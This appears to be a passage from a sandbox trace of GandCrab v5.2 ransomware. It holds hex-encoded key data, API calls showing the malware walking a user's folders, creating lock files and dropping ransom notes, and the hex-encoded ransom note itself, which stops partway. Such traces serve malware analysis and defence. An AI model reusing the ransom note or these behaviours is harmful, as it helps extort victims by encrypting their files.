1\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0080.902] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0080.903] CloseHandle (hObject=0x2d4) returned 1 [0080.903] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.903] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.904] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1a, wMilliseconds=0xda)) [0080.904] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.904] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0080.904] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0080.905] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\d2ca4a09d2ca4deb61a.lock") returned 118 [0080.905] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0080.905] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.905] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.905] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\") returned 94 [0080.905] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\*" [0080.906] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x503738 [0080.906] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.906] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0080.906] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.906] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.906] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0080.906] lstrcmpW (lpString1="archived", lpString2=".") returned 1 [0080.906] lstrcmpW (lpString1="archived", lpString2="..") returned 1 [0080.906] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\", lpString2="archived" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived" [0080.906] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\" [0080.906] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0080.907] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.907] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0080.907] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.907] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0080.907] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.907] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0080.907] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0080.907] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0080.907] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.908] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.908] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\\\TITWMVJL-DECRYPT.txt") returned 124 [0080.908] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0080.909] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20